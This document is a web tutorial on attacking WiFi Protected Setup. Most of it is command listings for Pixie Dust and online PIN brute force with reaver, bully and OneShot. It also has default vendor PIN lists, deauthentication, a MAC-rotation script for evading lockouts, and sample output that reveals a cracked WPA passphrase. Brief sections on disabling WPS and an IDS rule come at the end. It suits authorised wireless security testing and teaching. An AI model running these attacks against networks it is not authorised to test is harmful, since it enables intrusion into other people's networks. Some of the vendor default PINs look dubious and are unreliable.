WPS Attack Techniques

Exploitation

Master WiFi Protected Setup (WPS) exploitation including Pixie Dust attacks, online PIN brute force, offline attacks, and vendor-specific vulnerabilities.

Information

Guide Navigation: This comprehensive guide covers all WPS attack vectors. Use the table of contents below to jump to specific techniques.

πŸ“‘ Table of Contents

πŸ“– WPS Overview

WiFi Protected Setup (WPS) was introduced in 2006 to simplify WiFi setup for non-technical users. Instead of entering complex WPA2 passwords, users could press a button or enter an 8-digit PIN. However, the PIN method contains a catastrophic design flaw that reduces security from 10^8 combinations to just 11,000 attempts.

The vulnerability: WPS verifies the PIN in two separate halvesβ€”first 4 digits, then last 3 digits (the 8th digit is a checksum). An attacker only needs to brute force 10,000 possibilities for the first half, then 1,000 for the second half. This means any WPS-enabled router can be cracked in hours to days regardless of WPA2 password strength. Even worse, many routers use computed or hardcoded default PINs based on MAC address or serial number.

What is WPS?

πŸ“‹ WPS Overview

  • Introduced: 2006 by WiFi Alliance
  • Purpose: Simplify network setup

Methods:

  1. PIN Entry (most common)
  2. Push Button Configuration (PBC)
  3. NFC
  4. USB

⚠️ Security Issues

  • 8-digit PIN reduced to 11,000 combinations
  • Last digit is checksum (effectively 7 digits)
  • First 4 digits checked separately from last 3
  • 10,000 + 1,000 = 11,000 max attempts (not 10^8)

WPS PIN Structure

python 
# 8-digit PIN format: XXXX-XXX-C
# Example: 1234-567-8

Position 1-4: First half (10,000 possibilities)
Position 5-7: Second half (1,000 possibilities)
Position 8:   Checksum digit

# Checksum calculation
def wps_checksum(pin):
    accum = 0
    for i in range(7):
        accum += (3 * (int(pin[i]) % 2) + 1) * int(pin[i])
    return (10 - (accum % 10)) % 10

# Valid PIN: first 7 digits + checksum
pin = "12345678"
checksum = wps_checksum(pin[:7])
valid_pin = pin[:7] + str(checksum)

🎯 Reconnaissance

1. Identify WPS-Enabled Networks

bash 
# Wash - WPS scanner
sudo wash -i wlan0mon

# Output shows:
# BSSID | Channel | RSSI | WPS Version | WPS Locked | ESSID

# Filter for unlocked WPS
sudo wash -i wlan0mon | grep -v "Locked"

# Save results
sudo wash -i wlan0mon -o wps_targets.txt

# Alternative: airodump-ng
sudo airodump-ng wlan0mon --wps

2. Check WPS Configuration

bash 
# Detailed WPS info
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -S

# Check for known vulnerable PINs
sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -S

# Test rate limiting
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -l 30 -N

⚑ Pixie Dust Attack

Pixie Dust is an offline attack discovered in 2014 that exploits weak random number generation in WPS implementations. Instead of brute forcing 11,000 PINs online (slow), Pixie Dust computes the PIN offline in seconds by exploiting how routers generate nonces during WPS negotiation. This affects primarily Broadcom, Ralink, and some Realtek chipsetsβ€”roughly 30-40% of WPS-enabled routers.

How it works: During WPS registration, the router generates two secret nonces (E-S1 and E-S2) that should be random. Vulnerable implementations use low-entropy RNGs or even deterministic algorithms based on MAC address and timestamp. By capturing a single M1-M3 WPS handshake exchange, the Pixie Dust algorithm can reverse-engineer the nonces and directly compute the WPS PIN. The attack completes in 2-60 seconds depending on chipset, making it dramatically faster than brute force.

Warning

Pixie Dust Success Rate: Works on ~30-40% of routers. If Pixie Dust fails, the router uses proper RNG and you must resort to online brute force (slower but still works).

1. Reaver Pixie Dust

bash 
# Basic Pixie Dust attack
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K

# With verbose output
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K -vv

# Faster rate (if not rate limited)
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K -d 0 -T 0.5

# Specify delay between attempts
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K -d 2 -T 1

# Output on success:
# [+] WPS PIN: '12345670'
# [+] WPA PSK: 'supersecretpassword'
# [+] AP SSID: 'TargetNetwork'

2. OneShot - Modern Pixie Dust Tool

bash 
# Install
git clone https://github.com/kimocoder/OneShot
cd OneShot
sudo python3 oneshot.py -i wlan0mon

# Target specific AP
sudo python3 oneshot.py -i wlan0mon -b <BSSID> -K

# With EAPOL start workaround
sudo python3 oneshot.py -i wlan0mon -b <BSSID> -K --no-eap

# Force specific mode
sudo python3 oneshot.py -i wlan0mon -b <BSSID> -K -m 2

# Modes:
# 1: M1-M2 exchange (fastest)
# 2: M1-M3 exchange
# 3: M1-M5 exchange (slowest but most compatible)

3. Pixiewps - Offline PIN Recovery

bash 
# If you captured M1-M3 with reaver/bully
# Extract PKE, PKR, E-Hash1, E-Hash2, E-Nonce, R-Nonce

pixiewps -e <PKE> -r <PKR> -s <E-Hash1> <E-Hash2> -z <E-Nonce> -a <R-Nonce> -n <AUTHKEY>

# With vendor mode
pixiewps -e <PKE> -r <PKR> -s <E-Hash1> <E-Hash2> -z <E-Nonce> -a <R-Nonce> -m 3

# Modes:
# 0: Auto-detect
# 3: Broadcom
# 4: Ralink (small S1 S2)
# 5: Realtek

πŸ”¨ Online Brute Force

1. Reaver - Standard Attack

bash 
# Basic brute force
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv

# Optimized settings
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv \
  -d 15 \      # 15 sec delay between attempts
  -T 0.5 \     # 0.5 sec timeout
  -r 3:15 \    # 3 attempts, wait 15 sec if failed
  -l 300 \     # Lock delay 300 sec
  -N \         # Don't send NACK messages
  -g 1          # Max EAPOL start attempts

# Resume previous session
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -s /tmp/reaver.wpc

# Small DH keys (faster)
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv --dh-small

# Fixed channel hopping
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv --fixed

2. Bully - Reaver Alternative

bash 
# Basic attack
sudo bully wlan0mon -b <BSSID> -c <CHANNEL>

# Verbose output
sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -v 3

# Optimized
sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -d -v 3 -T 1

# Resume session
sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -w

# Specific PIN range
sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -p 12345670:12345679

3. Rate Limiting Bypass

bash 
# Strategy 1: Slow and steady
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -d 60 -T 1 -r 5:60

# Strategy 2: MAC spoofing rotation
#!/bin/bash
BSSID="AA:BB:CC:DD:EE:FF"
CHANNEL="6"

for i in {1..10}; do
  # Change MAC
  sudo ifconfig wlan0mon down
  sudo macchanger -r wlan0mon
  sudo ifconfig wlan0mon up
  
  # Try 10 PINs
  timeout 300 sudo reaver -i wlan0mon -b $BSSID -c $CHANNEL -vv -d 15 -N
  
  sleep 300  # Wait 5 minutes
done

# Strategy 3: Multiple interfaces
# Use USB WiFi adapters in parallel (different MACs)

πŸ“‹ Known Default PINs

Common Vendor PINs

bash 
# ComputedPIN algorithms (vendor-specific)
# Try these before brute force

# Arcadyan routers (Orange, Belgacom, Thomson)
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -p 12345670

# Zyxel
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -p 12345678

# Belkin
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -p 56562562

# D-Link (some models)
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -p 68175896

# ASUS
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -p 12345670

# Linksys (WRT series)
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -p 20172017

ComputedPIN Generators

bash 
# wpspin - Generate PINs from BSSID
git clone https://github.com/wiire/pixiewps
cd scripts

# Generate possible PINs
python3 wpspin.py <BSSID>

# Example output:
# [+] 76229909
# [+] 12345670
# [+] 87654321

# Test all generated PINs
for pin in $(python3 wpspin.py <BSSID>); do
  sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -p $pin
done

🎲 WPS Offline Attack

Capture EAPOL Handshake

bash 
# Start capture
sudo airodump-ng -c <CHANNEL> -w wps_capture --bssid <BSSID> wlan0mon

# In another terminal, trigger WPS
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -d 5 -L -N

# Or use aireplay to cause deauth
sudo aireplay-ng -0 5 -a <BSSID> wlan0mon

# Stop after capturing M1-M7 messages
# Convert to format for pixiewps
sudo tshark -r wps_capture-01.cap -Y "eapol" -T fields \
  -e wps.public_key_enrollee \
  -e wps.public_key_registrar \
  -e wps.e_hash1 \
  -e wps.e_hash2 \
  -e wps.enrollee_nonce \
  -e wps.registrar_nonce

πŸ› οΈ Advanced Techniques

1. Null PIN Attack

bash 
# Some routers accept null/empty PIN
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -p ""

# Or zero PIN
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -p 00000000

2. Downgrade Attack

bash 
# Force WPS version downgrade
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv --win7

# Try different WPS methods
sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -m 1  # PBC
sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -m 2  # PIN

3. External Registrar Attack

bash 
# Act as external registrar
sudo wifite --wps --pixie --ignore-locks

# Custom external registrar
git clone https://github.com/0xacid/erpwps
cd erpwps
sudo python2 erpwps.py -m <BSSID> -i wlan0mon

πŸ”§ Troubleshooting

Common Issues

bash 
# Issue: "WARNING: Failed to associate with <BSSID>"
# Fix 1: Improve signal strength (move closer)
# Fix 2: Change MAC address
sudo macchanger -r wlan0mon

# Issue: "WARNING: Detected AP rate limiting"
# Fix: Increase delay
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -d 120

# Issue: "WARNING: WPS transaction failed (code: 0x03)"
# Fix: Try --no-nacks
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -N

# Issue: "WPS pin not found!" with Pixie Dust
# Fix: Not vulnerable to Pixie Dust, try brute force

# Issue: Reaver locks up
# Fix: Kill and remove session file
sudo killall reaver
rm /usr/local/etc/reaver/*.wpc

Signal Optimization

bash 
# Check signal strength
sudo airodump-ng wlan0mon --bssid <BSSID>

# Increase TX power (if supported)
sudo iwconfig wlan0mon txpower 30

# Use directional antenna
# External high-gain antenna recommended

# Monitor errors
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv 2>&1 | grep -i "error|warn"

πŸ§ͺ Testing Verification

WPS Security Assessment

bash 
# 1. Check if WPS is enabled
sudo wash -i wlan0mon | grep <BSSID>

# 2. Test Pixie Dust vulnerability
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K -vv -N

# 3. Check rate limiting
# Try 10 rapid PINs
for i in {1..10}; do
  sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -d 0
done

# 4. Test lock mechanism
# If locked after X attempts, good security
sudo wash -i wlan0mon | grep -i "locked"

# 5. Verify WPS can be disabled
# Client-side: Check router interface
# Should have option: "Disable WPS"

Automated Testing Script

bash 
#!/bin/bash
# wps_audit.sh

INTERFACE="wlan0mon"
BSSID="$1"
CHANNEL="$2"
LOGFILE="wps_audit_$(date +%Y%m%d_%H%M%S).log"

echo "[*] WPS Security Audit for $BSSID" | tee -a $LOGFILE

# Check WPS status
echo "[+] Checking WPS status..." | tee -a $LOGFILE
sudo wash -i $INTERFACE | grep $BSSID | tee -a $LOGFILE

# Pixie Dust test
echo "[+] Testing Pixie Dust vulnerability..." | tee -a $LOGFILE
timeout 120 sudo reaver -i $INTERFACE -b $BSSID -c $CHANNEL -K -vv | tee -a $LOGFILE

# Common PINs
echo "[+] Testing common default PINs..." | tee -a $LOGFILE
PINS=("12345670" "12345678" "00000000" "56562562")
for pin in "${PINS[@]}"; do
  echo "[*] Trying PIN: $pin" | tee -a $LOGFILE
  timeout 30 sudo reaver -i $INTERFACE -b $BSSID -c $CHANNEL -p $pin -vv | tee -a $LOGFILE
done

# Rate limiting test
echo "[+] Testing rate limiting..." | tee -a $LOGFILE
for i in {1..5}; do
  timeout 10 sudo reaver -i $INTERFACE -b $BSSID -c $CHANNEL -vv -d 0 2>&1 | grep -i "rate|lock" | tee -a $LOGFILE
done

echo "[+] Audit complete. Results in $LOGFILE"

πŸ›‘οΈ Mitigation & Defense

Disable WPS

βš™οΈ Router Configuration Steps

  1. Access router admin panel (usually http://192.168.1.1)
  2. Login with admin credentials
  3. Navigate to: Wireless β†’ WPS Settings
  4. Set: WPS Enabled = Disabled
  5. Save and reboot
bash 
# Verify WPS is disabled
sudo wash -i wlan0mon
# Target should not appear or show "No WPS"

Information

Hardware Button: Some routers have a physical WPS button that can be disabled in firmware settings.

Detection

bash 
# Monitor for WPS brute force attempts
# Look for repeated EAPOL frames

sudo tcpdump -i wlan0mon -n -e -s 0 -v 'type mgt subtype probe-req' | grep -i "wps"

# IDS rule (Suricata/Snort)
alert wlan any any -> any any (msg:"WPS Brute Force Attempt"; \
  content:"|10 4a 00 01 10|"; threshold:type both,track by_src,count 10,seconds 60; \
  sid:1000001;)

# Log analysis
# Check router logs for:
# - Multiple failed WPS attempts
# - WPS transactions from unknown devices
# - Rapid PIN attempts

πŸ“š Key Takeaways

Warning

  • WPS = Weak: Design flaw reduces 8-digit PIN to 11,000 attempts
  • Pixie Dust: Exploits weak RNG - works offline if vulnerable
  • Disable WPS: Only reliable mitigation is complete WPS disablement
  • Rate Limiting: Some routers lock WPS after failed attempts (bypass with MAC spoofing)
  • Default PINs: Many vendors use computed/static default PINs
  • Physical Button: WPS push-button is safer but still risky if enabled

Related Topics

Wireless Pentesting

WPA Cracking

Deauth Attacks